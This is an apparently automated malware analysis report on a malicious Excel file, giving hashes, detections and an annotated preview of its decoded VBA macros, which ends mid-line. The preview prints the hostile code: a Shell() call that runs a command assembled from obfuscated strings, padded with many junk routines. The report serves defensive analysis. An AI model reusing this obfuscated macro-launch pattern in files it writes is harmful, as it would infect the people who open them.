Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 069b517eeca2f04f…

MALICIOUS

Office (OLE)

Size: 182.5 KB · Created: 2006-09-16 00:00:00 · Authoring application: Microsoft Excel · First seen: 2020-06-01
MD5: 789f27200694ca01a55dcf173aaba5e0 SHA-1: 6e3ef01c46ca85367cf923215f1ef69aae493db7 SHA-256: 069b517eeca2f04f7f0923a5a52cb2a2f1a840c04c7f382851ddccd37abd16dd
Risk score: 140

Malware Insights

MITRE ATT&CK
T1059.005 (Command and Scripting Interpreter: Visual Basic); T1204.002 (User Execution: Malicious File)

The critical heuristic 'OLE_VBA_SHELL' indicates the presence of a Shell() call within the VBA macros. This function is used to execute external commands. The ClamAV detection name 'Xls.Malware.Stratos-7506050-0' further confirms the malicious nature of the file. The VBA macro likely uses the Shell() function to download and execute a second-stage payload, a common technique for malware distribution.

Heuristics 3

  • ClamAV: Xls.Malware.Stratos-7506050-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Malware.Stratos-7506050-0
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 34839 bytes
SHA-256: 4d8dd9910342e3f72e0c9caf31966ee2ed63b26a77753ced8b7c386dd0bba753
Preview script
First 1,000 lines of the extracted script
' Analyst note: this is the decoded VBA source carved by olevba (macros.bas).
' Only the first routine (buhajskd) contains a behavioural statement — the
' Shell() call flagged by OLE_VBA_SHELL. Every routine after it in this preview
' is built from the same growing template of no-op GoTo/label pairs, string
' comparisons that can never be true, DoEvents loops and unused assignments;
' none of them is called from the visible code, which is consistent with
' junk-code padding (presumed — the preview is truncated at 1,000 lines).
Attribute VB_Name = "Module1"
' Routine flagged by the OLE_VBA_SHELL heuristic. The name is a random
' identifier; no auto-execute name (e.g. Workbook_Open) is visible in this
' excerpt, so how it is triggered cannot be determined from the preview.
Sub buhajskd()

' dF8aNT3QE is not defined anywhere in the visible preview. From its two uses it
' looks like a string-decoding helper taking an obfuscated literal and a short
' second argument ("4") — TODO confirm against the full extracted macro source.
h0m = dF8aNT3QE("qwlxe$lxxt>``n2qt`", "4")

' The only behavioural statement in the preview: runs an external command
' assembled from two decoded fragments (ATT&CK T1059.005). From a detection
' standpoint this surfaces as the Office host spawning a child process; the
' report's inference that it fetches a second stage is not verifiable from
' this code alone because the decoded strings are not shown.
Shell (h0m + dF8aNT3QE("ehnl4q\Ew|jweewhm", "4"))

End Sub
' Filler routine: the GoTo targets the label on the very next line, so the
' function body does nothing and assigns no return value. Not called from any
' visible code.
Private Function dDMZBUAYqPBvNwTDNTPcsHO()
GoTo IJqxPYNtopndkrHjiyoriHkPM
IJqxPYNtopndkrHjiyoriHkPM:

End Function
' Filler routine: a no-op GoTo to the next line, followed by a comparison of
' two different string literals. Because the literals never match, the End
' statement (which would terminate the macro) is unreachable. No return value
' is assigned and nothing calls this in the visible code.
Private Function jEulzJssffGOcDCbsEtqkCzVFQQSevwRSd()
GoTo IJqxPYNtopndkrHjiyoriHkPM
IJqxPYNtopndkrHjiyoriHkPM:
' Dead branch: "GNhpeJFFDI" is never equal to the right-hand literal.
If "GNhpeJFFDI" = "ZgKlQnqtlJnCxmGxoBLvuiTvResardHvtnFCZuTZV" Then End

End Function
' Filler routine: same template as the previous function plus one more
' comparison of unequal string literals. Both End branches are dead; the
' function has no effect and no return value.
Private Function kzUVfpkNdwPeSyHIGLwpwbo()
GoTo IJqxPYNtopndkrHjiyoriHkPM
IJqxPYNtopndkrHjiyoriHkPM:
' Dead branches: the literal pairs below differ, so End never executes.
If "GNhpeJFFDI" = "ZgKlQnqtlJnCxmGxoBLvuiTvResardHvtnFCZuTZV" Then End
If "BbqiSACQzERdxKykL" = "SvdugkJkvpHEcxVNKVn" Then End

End Function
' Filler routine: two dead comparisons and a second no-op GoTo/label pair.
' No behavioural statement and no return value; not called from visible code.
Private Function QKTsmPRySYgVBKK()
GoTo IJqxPYNtopndkrHjiyoriHkPM
IJqxPYNtopndkrHjiyoriHkPM:
' Dead branches: the literal pairs below differ, so End never executes.
If "GNhpeJFFDI" = "ZgKlQnqtlJnCxmGxoBLvuiTvResardHvtnFCZuTZV" Then End
If "BbqiSACQzERdxKykL" = "SvdugkJkvpHEcxVNKVn" Then End
' No-op jump: the target label is the next line.
GoTo zerqGJMEdslUC
zerqGJMEdslUC:

End Function
' Filler routine (Public Sub, so it would appear in the Excel macro list, but
' nothing in the visible code calls it). Three comparisons of unequal string
' literals and two no-op GoTo/label pairs; nothing executes with side effects.
Public Sub aCGURANnnOQjLfKj()
GoTo IJqxPYNtopndkrHjiyoriHkPM
IJqxPYNtopndkrHjiyoriHkPM:
' Dead branches: the literal pairs below differ, so End never executes.
If "GNhpeJFFDI" = "ZgKlQnqtlJnCxmGxoBLvuiTvResardHvtnFCZuTZV" Then End
If "BbqiSACQzERdxKykL" = "SvdugkJkvpHEcxVNKVn" Then End
GoTo zerqGJMEdslUC
zerqGJMEdslUC:
If "FYHeNZfbmDRablIDgi" = "NhpfKFGEJuBIZzzOF" Then End

End Sub
' Filler routine: the same dead-comparison template, now followed by a loop
' that calls DoEvents ten times. DoEvents only yields to the message queue;
' the loop computes nothing. No return value is assigned.
Public Function zZBgeLAULCPbJIwwY()
GoTo IJqxPYNtopndkrHjiyoriHkPM
IJqxPYNtopndkrHjiyoriHkPM:
' Dead branches: the literal pairs below differ, so End never executes.
If "GNhpeJFFDI" = "ZgKlQnqtlJnCxmGxoBLvuiTvResardHvtnFCZuTZV" Then End
If "BbqiSACQzERdxKykL" = "SvdugkJkvpHEcxVNKVn" Then End
GoTo zerqGJMEdslUC
zerqGJMEdslUC:
If "FYHeNZfbmDRablIDgi" = "NhpfKFGEJuBIZzzOF" Then End
' Ten iterations of DoEvents: yields control, produces no value.
Dim TrJVJHBTQnQin As Integer
For TrJVJHBTQnQin = 0 To 9
   DoEvents
Next TrJVJHBTQnQin

End Function
' Filler routine: identical to the previous function plus a third no-op
' GoTo/label pair at the end. No side effects, no return value.
Public Function jktRycrYexFvbVQUaK()
GoTo IJqxPYNtopndkrHjiyoriHkPM
IJqxPYNtopndkrHjiyoriHkPM:
' Dead branches: the literal pairs below differ, so End never executes.
If "GNhpeJFFDI" = "ZgKlQnqtlJnCxmGxoBLvuiTvResardHvtnFCZuTZV" Then End
If "BbqiSACQzERdxKykL" = "SvdugkJkvpHEcxVNKVn" Then End
GoTo zerqGJMEdslUC
zerqGJMEdslUC:
If "FYHeNZfbmDRablIDgi" = "NhpfKFGEJuBIZzzOF" Then End
' Ten iterations of DoEvents: yields control, produces no value.
Dim TrJVJHBTQnQin As Integer
For TrJVJHBTQnQin = 0 To 9
   DoEvents
Next TrJVJHBTQnQin
' No-op jump: the target label is the next line.
GoTo oEHKCbEjSODYNESd
oEHKCbEjSODYNESd:

End Function
' Filler routine: the growing template plus a Long variable that is assigned
' the string literal "5872" and never read. The assignment relies on VBA's
' implicit string-to-number coercion and has no observable effect.
Private Sub LylMjvJrIuyYMJDVSq()
GoTo IJqxPYNtopndkrHjiyoriHkPM
IJqxPYNtopndkrHjiyoriHkPM:
' Dead branches: the literal pairs below differ, so End never executes.
If "GNhpeJFFDI" = "ZgKlQnqtlJnCxmGxoBLvuiTvResardHvtnFCZuTZV" Then End
If "BbqiSACQzERdxKykL" = "SvdugkJkvpHEcxVNKVn" Then End
GoTo zerqGJMEdslUC
zerqGJMEdslUC:
If "FYHeNZfbmDRablIDgi" = "NhpfKFGEJuBIZzzOF" Then End
' Ten iterations of DoEvents: yields control, produces no value.
Dim TrJVJHBTQnQin As Integer
For TrJVJHBTQnQin = 0 To 9
   DoEvents
Next TrJVJHBTQnQin
GoTo oEHKCbEjSODYNESd
oEHKCbEjSODYNESd:
' Unused local: written once, never read.
Dim yBPlnwGBeuMh As Long
yBPlnwGBeuMh = "5872"

End Sub
' Filler routine: previous template plus a second DoEvents loop of two
' iterations. Still no side effects beyond yielding, and nothing visible
' calls it.
Private Sub PZZYdNGNsFEU()
GoTo IJqxPYNtopndkrHjiyoriHkPM
IJqxPYNtopndkrHjiyoriHkPM:
' Dead branches: the literal pairs below differ, so End never executes.
If "GNhpeJFFDI" = "ZgKlQnqtlJnCxmGxoBLvuiTvResardHvtnFCZuTZV" Then End
If "BbqiSACQzERdxKykL" = "SvdugkJkvpHEcxVNKVn" Then End
GoTo zerqGJMEdslUC
zerqGJMEdslUC:
If "FYHeNZfbmDRablIDgi" = "NhpfKFGEJuBIZzzOF" Then End
' Ten iterations of DoEvents: yields control, produces no value.
Dim TrJVJHBTQnQin As Integer
For TrJVJHBTQnQin = 0 To 9
   DoEvents
Next TrJVJHBTQnQin
GoTo oEHKCbEjSODYNESd
oEHKCbEjSODYNESd:
' Unused local: written once, never read.
Dim yBPlnwGBeuMh As Long
yBPlnwGBeuMh = "5872"
' Two more DoEvents iterations; no value produced.
Dim GzjRToQVjtOcP As Integer
For GzjRToQVjtOcP = 0 To 1
   DoEvents
Next GzjRToQVjtOcP

End Sub
' Filler routine: the full template seen so far plus a fourth no-op
' GoTo/label pair. No return value is assigned; nothing visible calls it.
Public Function MtKxBbBMGZVs()
GoTo IJqxPYNtopndkrHjiyoriHkPM
IJqxPYNtopndkrHjiyoriHkPM:
' Dead branches: the literal pairs below differ, so End never executes.
If "GNhpeJFFDI" = "ZgKlQnqtlJnCxmGxoBLvuiTvResardHvtnFCZuTZV" Then End
If "BbqiSACQzERdxKykL" = "SvdugkJkvpHEcxVNKVn" Then End
GoTo zerqGJMEdslUC
zerqGJMEdslUC:
If "FYHeNZfbmDRablIDgi" = "NhpfKFGEJuBIZzzOF" Then End
' Ten iterations of DoEvents: yields control, produces no value.
Dim TrJVJHBTQnQin As Integer
For TrJVJHBTQnQin = 0 To 9
   DoEvents
Next TrJVJHBTQnQin
GoTo oEHKCbEjSODYNESd
oEHKCbEjSODYNESd:
' Unused local: written once, never read.
Dim yBPlnwGBeuMh As Long
yBPlnwGBeuMh = "5872"
' Two more DoEvents iterations; no value produced.
Dim GzjRToQVjtOcP As Integer
For GzjRToQVjtOcP = 0 To 1
   DoEvents
Next GzjRToQVjtOcP
' No-op jump: the target label is the next line.
GoTo nDSoclIDhj
nDSoclIDhj:

End Function
Private Sub kpxnSbcafCJQuHGQbe()
GoTo IJqxPYNtopndkrHjiyoriHkPM
IJqxPYNtopndkrHjiyoriHkPM:
If "GNhpeJFFDI" = "ZgKlQnqtlJnCxmGxoBLvuiTvResa
... (truncated)